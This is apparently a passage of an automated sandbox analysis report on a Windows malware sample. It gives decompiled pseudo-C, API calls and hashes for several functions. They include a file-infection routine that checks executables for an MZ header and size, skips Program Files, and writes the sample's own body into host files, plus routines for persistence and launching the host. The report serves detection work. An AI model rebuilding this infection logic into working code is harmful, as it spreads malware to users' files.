                                                                                                                          • Instruction Fuzzy Hash: 37E16170A002189BDB10EBA9D885AAEB7F5AF49304F11807BF405FB3C1DA3D9D55CB69
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004071D0, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 184COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 83%
                                                                                                                          			E004071D0(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v9;
				char _v16;
				char _v40254;
				char _v41487;
				char _v41488;
				char _v41492;
				char _v41496;
				char _v41500;
				char _v41504;
				void* _t45;
				void* _t80;
				void* _t82;
				long _t85;
				CHAR* _t130;
				intOrPtr _t150;
				void* _t154;
				void* _t155;
				long _t173;
				void* _t177;
				void* _t178;

				_t128 = __ebx;
				_t177 = _t178;
				_push(__eax);
				_t45 = 0xa;
				goto L1;
				L17:
				_pop(_t150);
				 *[fs:eax] = _t150;
				_push(E00407493);
				E004030B8( &_v41504, 4);
				return E00403094( &_v8);
				L1:
				_t178 = _t178 + 0xfffff004;
				_push(_t45);
				_t45 = _t45 - 1;
				_t180 = _t45;
				if(_t45 != 0) {
					goto L1;
				} else {
					_push(__ebx);
					_v41504 = 0;
					_v41500 = 0;
					_v41496 = 0;
					_v41492 = 0;
					E004033FC(_v8);
					_push(_t177);
					_push(0x40748c);
					_push( *[fs:eax]);
					 *[fs:eax] = _t178 + 0xfffffde8;
					_v9 = 0;
					E004031F4( &_v41492, 3, 0x4091c0);
					if(E00406FE4(_v8, __ebx, _v41492, _t180) != 0) {
						E00404F34(_v8,  &_v41496);
						E0040312C( &_v8, _v41496);
						E00404F90( &_v41500, _t128, 3);
						_push(E0040340C(_v41500));
						_t129 = E0040340C(_v8);
						_pop(_t154);
						if(E00404B38(_t68, _t154) == 0) {
							E00405008( &_v41504, _t129, 3);
							_t155 = E0040340C(_v41504);
							if(E00404B38(_t129, _t155) == 0 && E004034EC("\\PROGRA~1\\", _v8) != 3) {
								_t80 = E00404F6C(_v8);
								if(_t80 > 0xa200 && _t80 <= 0x989680) {
									_t82 = E00407130(_v8, _t129); // executed
									if(_t82 == 0) {
										_v9 = 1;
										_t130 = E0040340C(_v8);
										_t85 = GetFileAttributesA(_t130); // executed
										_t173 = _t85;
										if((_t173 & 0x00000001) > 0) {
											SetFileAttributesA(_t130, 0);
										}
										_t131 = E00405BDC();
										_t175 = E004064CC();
										E00406CA8(_t87, 0, _v8);
										E00406510(_t175, _t86);
										E00405974();
										E00404198();
										E00405988(_t131);
										E00404520(_t131);
										E00404520(_t175);
										_t132 = E00404B68(_v8, 0xc0000303);
										if(_t103 != 0xffffffff) {
											E00404BC4(_t132, 2,  &_v41488);
											if(_v41488 == 0x4d && _v41487 == 0x5a) {
												E00404BB4(_t132, 0, 0);
												E00404BC4(_t132, 0xa200,  &_v41488);
												E0040254C( &_v40254, 4,  &_v16);
												E00407080( &_v41488, _v16, 0x3e8);
												E00404BB4(_t132, 0, 0);
												E00404BE0(_t132, 0xa200, 0x40a698);
												E00404BB4(_t132, 2, 0);
												E00404BE0(_t132, 0xa200,  &_v41488);
											}
										}
										E00404B90(_t132);
										if((_t173 & 0x00000001) > 0) {
											SetFileAttributesA(E0040340C(_v8), _t173);
										}
									}
								}
							}
						}
					}
					goto L17;
				}
			}
























                                                                                                                          0x004071d0
                                                                                                                          0x004071d1
                                                                                                                          0x004071d3
                                                                                                                          0x004071d4
                                                                                                                          0x004071d4
                                                                                                                          0x00407466
                                                                                                                          0x00407468
                                                                                                                          0x0040746b
                                                                                                                          0x0040746e
                                                                                                                          0x0040747e
                                                                                                                          0x0040748b
                                                                                                                          0x004071d9
                                                                                                                          0x004071d9
                                                                                                                          0x004071df
                                                                                                                          0x004071e0
                                                                                                                          0x004071e0
                                                                                                                          0x004071e1
                                                                                                                          0x00000000
                                                                                                                          0x004071e3
                                                                                                                          0x004071ec
                                                                                                                          0x004071f1
                                                                                                                          0x004071f7
                                                                                                                          0x004071fd
                                                                                                                          0x00407203
                                                                                                                          0x0040720f
                                                                                                                          0x00407216
                                                                                                                          0x00407217
                                                                                                                          0x0040721c
                                                                                                                          0x0040721f
                                                                                                                          0x00407222
                                                                                                                          0x00407236
                                                                                                                          0x0040724b
                                                                                                                          0x0040725a
                                                                                                                          0x00407268
                                                                                                                          0x00407273
                                                                                                                          0x00407283
                                                                                                                          0x0040728c
                                                                                                                          0x00407290
                                                                                                                          0x00407298
                                                                                                                          0x004072a4
                                                                                                                          0x004072b7
                                                                                                                          0x004072bf
                                                                                                                          0x004072de
                                                                                                                          0x004072e8
                                                                                                                          0x004072fc
                                                                                                                          0x00407303
                                                                                                                          0x00407309
                                                                                                                          0x00407315
                                                                                                                          0x00407318
                                                                                                                          0x0040731d
                                                                                                                          0x00407325
                                                                                                                          0x0040732a
                                                                                                                          0x0040732a
                                                                                                                          0x00407334
                                                                                                                          0x0040733b
                                                                                                                          0x00407344
                                                                                                                          0x0040734d
                                                                                                                          0x00407359
                                                                                                                          0x00407368
                                                                                                                          0x00407379
                                                                                                                          0x00407380
                                                                                                                          0x00407387
                                                                                                                          0x00407399
                                                                                                                          0x0040739e
                                                                                                                          0x004073b1
                                                                                                                          0x004073bd
                                                                                                                          0x004073d2
                                                                                                                          0x004073e4
                                                                                                                          0x004073f7
                                                                                                                          0x0040740a
                                                                                                                          0x00407415
                                                                                                                          0x00407426
                                                                                                                          0x00407431
                                                                                                                          0x00407443
                                                                                                                          0x00407443
                                                                                                                          0x004073bd
                                                                                                                          0x0040744a
                                                                                                                          0x00407455
                                                                                                                          0x00407461
                                                                                                                          0x00407461
                                                                                                                          0x00407455
                                                                                                                          0x00407303
                                                                                                                          0x004072e8
                                                                                                                          0x004072bf
                                                                                                                          0x00407298
                                                                                                                          0x00000000
                                                                                                                          0x0040724b

                                                                                                                          APIs
                                                                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00407318
                                                                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000), ref: 0040732A
                                                                                                                            • Part of subcall function 00404B68: CreateFileA.KERNEL32(00408220,80000301,80000301,00000000,80000301,80000301,00000000,00404CB4,00000000,00404CE6), ref: 00404B88
                                                                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000), ref: 00407461
                                                                                                                            • Part of subcall function 00404BC4: ReadFile.KERNEL32(00000000,MZP,?,?,00000000,00000000,?,00404CC7,00000000,00404CE6), ref: 00404BCF
                                                                                                                            • Part of subcall function 00404BB4: SetFilePointer.KERNEL32(00000000,000003E8,00000000,?,00407179,00000000,004071BF,?,00000000), ref: 00404BBC
                                                                                                                            • Part of subcall function 00404BE0: WriteFile.KERNEL32(00000000,MZP,0000A200,?,00000000,?,?,0040742B), ref: 00404BEA
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Attributes$CreatePointerReadWrite
                                                                                                                          • String ID: M$MZP$Z$\PROGRA~1\
                                                                                                                          • API String ID: 997383822-4093836345
                                                                                                                          • Opcode ID: 3325f7f34ba1cab3d3c53affcca57471aa0c7a6c0db11dbc350d39af7ef534dd
                                                                                                                          • Instruction ID: 377d96c4788612fdddee84976f6eb16641268004b287eb3b442383de46351668
                                                                                                                          • Opcode Fuzzy Hash: 3325f7f34ba1cab3d3c53affcca57471aa0c7a6c0db11dbc350d39af7ef534dd
                                                                                                                          • Instruction Fuzzy Hash: 71514370B042045BDB10FB6ACC82A8EB7A59F85308F1085BBB504B73D3DA7DEF454A5A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00401788, Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 68%
                                                                                                                          			E00401788() {
				void* _t11;
				signed int _t13;
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E0040183E);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x40a5b4);
				L004010DC();
				if( *0x40a035 != 0) {
					_push(0x40a5b4);
					L004010E4();
				}
				E0040114C(0x40a5d4);
				E0040114C(0x40a5e4);
				E0040114C(0x40a610);
				_t11 = LocalAlloc(0, 0xff8); // executed
				 *0x40a60c = _t11;
				if( *0x40a60c != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x40a60c; // 0x63f8a0
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x40a5f8)) = 0x40a5f4;
					 *0x40a5f4 = 0x40a5f4;
					 *0x40a600 = 0x40a5f4;
					 *0x40a5ac = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(0x401845);
				if( *0x40a035 != 0) {
					_push(0x40a5b4);
					L004010EC();
					return 0;
				}
				return 0;
			}








                                                                                                                          0x0040178d
                                                                                                                          0x0040178e
                                                                                                                          0x00401793
                                                                                                                          0x00401796
                                                                                                                          0x00401799
                                                                                                                          0x0040179e
                                                                                                                          0x004017aa
                                                                                                                          0x004017ac
                                                                                                                          0x004017b1
                                                                                                                          0x004017b1
                                                                                                                          0x004017bb
                                                                                                                          0x004017c5
                                                                                                                          0x004017cf
                                                                                                                          0x004017db
                                                                                                                          0x004017e0
                                                                                                                          0x004017ec
                                                                                                                          0x004017ee
                                                                                                                          0x004017f3
                                                                                                                          0x004017f3
                                                                                                                          0x004017fb
                                                                                                                          0x004017ff
                                                                                                                          0x00401800
                                                                                                                          0x0040180c
                                                                                                                          0x0040180f
                                                                                                                          0x00401811
                                                                                                                          0x00401816
                                                                                                                          0x00401816
                                                                                                                          0x0040181f
                                                                                                                          0x00401822
                                                                                                                          0x00401825
                                                                                                                          0x00401831
                                                                                                                          0x00401833
                                                                                                                          0x00401838
                                                                                                                          0x00000000
                                                                                                                          0x00401838
                                                                                                                          0x0040183d

                                                                                                                          APIs
                                                                                                                          • RtlInitializeCriticalSection.KERNEL32(0040A5B4,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 0040179E
                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0040A5B4,0040A5B4,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017B1
                                                                                                                          • LocalAlloc.KERNEL32(00000000,00000FF8,0040A5B4,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017DB
                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401845,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 00401838
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 730355536-0
                                                                                                                          • Opcode ID: 3b04e8016ad8e9f8d98138e13965f200bb98bfb7b6ef7e396ad35bd5d2b4b672
                                                                                                                          • Instruction ID: b00ea9f5082304a52c30b3310984ccb38099dd734a88c9f27aa2559637ee1f83
                                                                                                                          • Opcode Fuzzy Hash: 3b04e8016ad8e9f8d98138e13965f200bb98bfb7b6ef7e396ad35bd5d2b4b672
                                                                                                                          • Instruction Fuzzy Hash: 400184B0604380AEE715AF6A9D06B167BA4E749704F04C53FA140B66F2CA7D44A0CB5F
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00406B48, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 89%
                                                                                                                          			E00406B48(intOrPtr* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				struct _ICONINFO _v48;
				void* _t65;
				void* _t72;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t85;
				void* _t98;
				void* _t99;
				intOrPtr _t103;
				intOrPtr _t104;
				signed int _t111;
				intOrPtr* _t112;
				intOrPtr _t116;
				intOrPtr _t117;
				void* _t118;
				void* _t119;
				void* _t120;
				void* _t121;
				void* _t124;

				_v28 = 0;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_push(_t124);
				_push(0x406c97);
				_push( *[fs:eax]);
				 *[fs:eax] = _t124 + 0xffffffd4;
				_t116 = _v12;
				if(_t116 < 0) {
					L8:
					_v24 = E00405968();
					_push(_v12 + 1 + _v12 + 1);
					E00403B24();
					_t117 = _v12;
					if(_t117 >= 0) {
						_t120 = _t117 + 1;
						_v20 = 0;
						_t85 = _v8;
						do {
							GetIconInfo( *( *_t85 + 0x1c),  &_v48);
							_t81 = _v20 + _v20;
							 *((intOrPtr*)(_v28 + _t81 * 4)) = _v48.hbmColor;
							 *((intOrPtr*)(_v28 + 4 + _t81 * 4)) = _v48.hbmMask;
							_v20 = _v20 + 1;
							_t85 = _t85 + 4;
							_t120 = _t120 - 1;
						} while (_t120 != 0);
					}
					_t65 = E00406638(_v28, _v16, E00403970()); // executed
					if(_t65 == 0) {
						E00405990(_v16);
					}
					_t118 = E00403970();
					if(_t118 >= 0) {
						_t119 = _t118 + 1;
						_v20 = 0;
						do {
							_t72 =  *(_v28 + _v20 * 4);
							if(_t72 != 0) {
								DeleteObject(_t72);
							}
							_v20 = _v20 + 1;
							_t119 = _t119 - 1;
						} while (_t119 != 0);
					}
				} else {
					_t121 = _t116 + 1;
					_v20 = 0;
					_t82 = _v8;
					while( *((intOrPtr*)( *_t82 + 0x1c)) != 0) {
						_t111 = _v20 + 1;
						_t98 = _v12 - _t111;
						if(_t98 < 0) {
							L7:
							_v20 = _v20 + 1;
							_t82 = _t82 + 4;
							_t121 = _t121 - 1;
							if(_t121 != 0) {
								continue;
							} else {
								goto L8;
							}
						} else {
							_t99 = _t98 + 1;
							_t112 = _v8 + _t111 * 4;
							while( *((intOrPtr*)( *_t82 + 0x18)) !=  *((intOrPtr*)( *_t112 + 0x18))) {
								_t112 = _t112 + 4;
								_t99 = _t99 - 1;
								if(_t99 != 0) {
									continue;
								} else {
									goto L7;
								}
								goto L18;
							}
						}
						goto L18;
					}
				}
				L18:
				_pop(_t103);
				 *[fs:eax] = _t103;
				_push(E00406C9E);
				_t104 =  *0x406b28; // 0x406b2c
				return E00403B30( &_v28, _t104);
			}




























                                                                                                                          0x00406b53
                                                                                                                          0x00406b56
                                                                                                                          0x00406b59
                                                                                                                          0x00406b5c
                                                                                                                          0x00406b61
                                                                                                                          0x00406b62
                                                                                                                          0x00406b67
                                                                                                                          0x00406b6a
                                                                                                                          0x00406b6d
                                                                                                                          0x00406b72
                                                                                                                          0x00406bbc
                                                                                                                          0x00406bc4
                                                                                                                          0x00406bcd
                                                                                                                          0x00406bdc
                                                                                                                          0x00406be4
                                                                                                                          0x00406be9
                                                                                                                          0x00406beb
                                                                                                                          0x00406bec
                                                                                                                          0x00406bf3
                                                                                                                          0x00406bf6
                                                                                                                          0x00406c00
                                                                                                                          0x00406c08
                                                                                                                          0x00406c10
                                                                                                                          0x00406c19
                                                                                                                          0x00406c1d
                                                                                                                          0x00406c20
                                                                                                                          0x00406c23
                                                                                                                          0x00406c23
                                                                                                                          0x00406bf6
                                                                                                                          0x00406c36
                                                                                                                          0x00406c3d
                                                                                                                          0x00406c47
                                                                                                                          0x00406c47
                                                                                                                          0x00406c54
                                                                                                                          0x00406c58
                                                                                                                          0x00406c5a
                                                                                                                          0x00406c5b
                                                                                                                          0x00406c62
                                                                                                                          0x00406c68
                                                                                                                          0x00406c6d
                                                                                                                          0x00406c70
                                                                                                                          0x00406c70
                                                                                                                          0x00406c75
                                                                                                                          0x00406c78
                                                                                                                          0x00406c78
                                                                                                                          0x00406c62
                                                                                                                          0x00406b74
                                                                                                                          0x00406b74
                                                                                                                          0x00406b75
                                                                                                                          0x00406b7c
                                                                                                                          0x00406b7f
                                                                                                                          0x00406b8e
                                                                                                                          0x00406b92
                                                                                                                          0x00406b94
                                                                                                                          0x00406bb3
                                                                                                                          0x00406bb3
                                                                                                                          0x00406bb6
                                                                                                                          0x00406bb9
                                                                                                                          0x00406bba
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406b96
                                                                                                                          0x00406b96
                                                                                                                          0x00406b9a
                                                                                                                          0x00406b9d
                                                                                                                          0x00406bad
                                                                                                                          0x00406bb0
                                                                                                                          0x00406bb1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406bb1
                                                                                                                          0x00406b9d
                                                                                                                          0x00000000
                                                                                                                          0x00406b94
                                                                                                                          0x00406b7f
                                                                                                                          0x00406c7b
                                                                                                                          0x00406c7d
                                                                                                                          0x00406c80
                                                                                                                          0x00406c83
                                                                                                                          0x00406c8b
                                                                                                                          0x00406c96

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: DeleteIconInfoObject
                                                                                                                          • String ID: ,k@
                                                                                                                          • API String ID: 2689914137-1053005162
                                                                                                                          • Opcode ID: 5b49ef8e9806a3f921fc3957ab8aab80d154f68e659bcce45d0d70881c4801f7
                                                                                                                          • Instruction ID: dacdd831d29519e08e7e99a77df17fc26ef5cc856f0b9114ccf97923e4886ce8
                                                                                                                          • Opcode Fuzzy Hash: 5b49ef8e9806a3f921fc3957ab8aab80d154f68e659bcce45d0d70881c4801f7
                                                                                                                          • Instruction Fuzzy Hash: 9F413AB0E0021A9FDB14DF99C881AAEBBB4FF48314F11407AD942B7391D734AE51CB98
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004078A6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 72%
                                                                                                                          			E004078A6(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				char* _t39;
				void* _t40;
				void* _t46;
				intOrPtr _t57;
				void* _t61;

				_t60 = __esi;
				_t59 = __edi;
				_t46 = __ecx;
				_t45 = __ebx;
				E004049D0(0, __ebx, _t61 - 0xa244, __edi, __esi);
				E00404EEC(_t61 - 0xa240);
				SetCurrentDirectoryA(E0040340C( *((intOrPtr*)(_t61 - 0xa240)))); // executed
				_push(1);
				_push(0);
				E00406F34(1, __ebx, _t61 - 0xa248, __edi, __esi);
				_push(E0040340C( *((intOrPtr*)(_t61 - 0xa248))));
				E00405008(_t61 - 0xa250, _t45, _t46);
				E004031F4(_t61 - 0xa254, 9, 0x4091b4);
				E004049D0(0, _t45, _t61 - 0xa25c, _t59, _t60);
				E00404ED0( *((intOrPtr*)(_t61 - 0xa25c)), _t61 - 0xa258);
				E004032CC();
				_t39 = E0040340C( *((intOrPtr*)(_t61 - 0xa24c)));
				_t40 =  *0x40a650; // 0x400000
				ShellExecuteA(_t40, "open", _t39,  *(_t61 - 0xa258),  *(_t61 - 0xa254),  *(_t61 - 0xa250)); // executed
				_pop(_t57);
				 *[fs:eax] = _t57;
				_push(E00407993);
				return E004030B8(_t61 - 0xa25c, 0x14);
			}








                                                                                                                          0x004078a6
                                                                                                                          0x004078a6
                                                                                                                          0x004078a6
                                                                                                                          0x004078a6
                                                                                                                          0x004078ae
                                                                                                                          0x004078bf
                                                                                                                          0x004078d0
                                                                                                                          0x004078d5
                                                                                                                          0x004078d7
                                                                                                                          0x004078e1
                                                                                                                          0x004078f1
                                                                                                                          0x004078f8
                                                                                                                          0x00407913
                                                                                                                          0x00407926
                                                                                                                          0x00407937
                                                                                                                          0x0040794d
                                                                                                                          0x00407958
                                                                                                                          0x00407963
                                                                                                                          0x00407969
                                                                                                                          0x00407970
                                                                                                                          0x00407973
                                                                                                                          0x00407976
                                                                                                                          0x0040798b

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004049D0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000000,00404ADA,?,?,?,?,?,004070F9,00000000,00407126,?,00000000), ref: 00404A09
                                                                                                                          • SetCurrentDirectoryA.KERNEL32(00000000), ref: 004078D0
                                                                                                                            • Part of subcall function 00405008: GetTempPathA.KERNEL32(00000105,?,00000000,00405072,?,00000000), ref: 00405036
                                                                                                                            • Part of subcall function 004049D0: GetCommandLineA.KERNEL32(00000000,00404ADA,?,?,?,?,?,004070F9,00000000,00407126,?,00000000,?,00408179,00000000,00408220), ref: 00404A23
                                                                                                                          • ShellExecuteA.SHELL32(00400000,open,00000000,?,?,?), ref: 00407969
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CommandCurrentDirectoryExecuteFileLineModuleNamePathShellTemp
                                                                                                                          • String ID: open
                                                                                                                          • API String ID: 2622400689-2758837156
                                                                                                                          • Opcode ID: fab5c3a15cb1cae7a61865492dfe33df0841a2aab3c5e5074238c8010eb0912a
                                                                                                                          • Instruction ID: bc53e8da7d6e16968f2b3cdc64b9b09c5d4ffb8ac025ca0eed744acd73de400d
                                                                                                                          • Opcode Fuzzy Hash: fab5c3a15cb1cae7a61865492dfe33df0841a2aab3c5e5074238c8010eb0912a
                                                                                                                          • Instruction Fuzzy Hash: 83113070B107198ADB10FB79CC41A8DB779FF85308F0085F6B108BB192D67E9E858E5A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004079A0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 86fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 51%
                                                                                                                          			E004079A0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				void* _t31;
				void* _t59;
				intOrPtr _t73;
				void* _t82;
				void* _t83;
				intOrPtr _t86;

				_t83 = __esi;
				_t82 = __edi;
				_t54 = __ebx;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(_t86);
				_push(0x407ac4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t86;
				E00407080(0x4091e0, 0xb, 0xb);
				E004031F4( &_v12, 0xb, 0x4091e0);
				_push(_v12);
				E00404F90( &_v16, __ebx, 0xb);
				_pop(_t59);
				E00403258( &_v8, _t59, _v16);
				if(E00404B9C() != 0) {
					DeleteFileA(E0040340C(_v8));
				}
				_t31 = E00404BF8(E0040340C(_v8), _t54, 0xa200, 0x40a698, _t82, _t83); // executed
				if(_t31 != 0) {
					E00407080(0x4091ec, 0x1a, 0x1a);
					E004031F4( &_v20, 0x1a, 0x4091ec);
					_t55 = E0040575C(0x80000000, 0x1a, _v20);
					E00407080(0x409208, 8, 8);
					E004031F4( &_v28, 8, 0x409208);
					E00403258( &_v24, _v28, _v8);
					E0040578C(_t40, _v24, 0);
					E004057CC(_t55);
				}
				_pop(_t73);
				 *[fs:eax] = _t73;
				_push(E00407ACB);
				return E004030B8( &_v28, 6);
			}















                                                                                                                          0x004079a0
                                                                                                                          0x004079a0
                                                                                                                          0x004079a0
                                                                                                                          0x004079a5
                                                                                                                          0x004079a6
                                                                                                                          0x004079a7
                                                                                                                          0x004079a8
                                                                                                                          0x004079a9
                                                                                                                          0x004079aa
                                                                                                                          0x004079ab
                                                                                                                          0x004079ae
                                                                                                                          0x004079af
                                                                                                                          0x004079b4
                                                                                                                          0x004079b7
                                                                                                                          0x004079c9
                                                                                                                          0x004079db
                                                                                                                          0x004079e3
                                                                                                                          0x004079e7
                                                                                                                          0x004079f2
                                                                                                                          0x004079f3
                                                                                                                          0x00407a02
                                                                                                                          0x00407a0d
                                                                                                                          0x00407a0d
                                                                                                                          0x00407a24
                                                                                                                          0x00407a2b
                                                                                                                          0x00407a3c
                                                                                                                          0x00407a4e
                                                                                                                          0x00407a60
                                                                                                                          0x00407a71
                                                                                                                          0x00407a83
                                                                                                                          0x00407a91
                                                                                                                          0x00407a9d
                                                                                                                          0x00407aa4
                                                                                                                          0x00407aa4
                                                                                                                          0x00407aab
                                                                                                                          0x00407aae
                                                                                                                          0x00407ab1
                                                                                                                          0x00407ac3

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00404F90: GetWindowsDirectoryA.KERNEL32(?,00000105,00000000,00404FFA,?,?,?,00407EB6,00000000,00408020,?,?,00000000,00000000,?,0040819C), ref: 00404FBE
                                                                                                                            • Part of subcall function 00404B9C: GetFileAttributesA.KERNEL32(00000000,00407EDD,00000000,00408020,?,?,00000000,00000000,?,0040819C,00000000,00408220), ref: 00404BA2
                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00407AC4,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00408200,00000000,00408220), ref: 00407A0D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: File$AttributesDeleteDirectoryWindows
                                                                                                                          • String ID: MZP
                                                                                                                          • API String ID: 3550186980-2889622443
                                                                                                                          • Opcode ID: 3ee79c2a49ddb8816c4432ff5edea5131a792a15af00d109a84fb823656587da
                                                                                                                          • Instruction ID: 69b580403c23d9cc841dfa7c227de2d2e2536c961132663fd28ad6461d03daee
                                                                                                                          • Opcode Fuzzy Hash: 3ee79c2a49ddb8816c4432ff5edea5131a792a15af00d109a84fb823656587da
                                                                                                                          • Instruction Fuzzy Hash: 91212F70B04109ABDB04FAA5C85279F7B69EB85304F50847EA501BB3C2DF3CEE05976A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00404BC4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404BC4(void* __eax, long __ecx, void* __edx) {
				int _t2;
				void* _t3;
				DWORD* _t8;

				_t2 = ReadFile(__eax, __edx, __ecx, _t8, 0); // executed
				_t3 = 0;
				if(_t2 == 0) {
					return 0;
				}
				return _t3;
			}






                                                                                                                          0x00404bcf
                                                                                                                          0x00404bd6
                                                                                                                          0x00404bd7
                                                                                                                          0x00000000
                                                                                                                          0x00404bd9
                                                                                                                          0x00404bdc

                                                                                                                          APIs
                                                                                                                          • ReadFile.KERNEL32(00000000,MZP,?,?,00000000,00000000,?,00404CC7,00000000,00404CE6), ref: 00404BCF
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID: MZP
                                                                                                                          • API String ID: 2738559852-2889622443
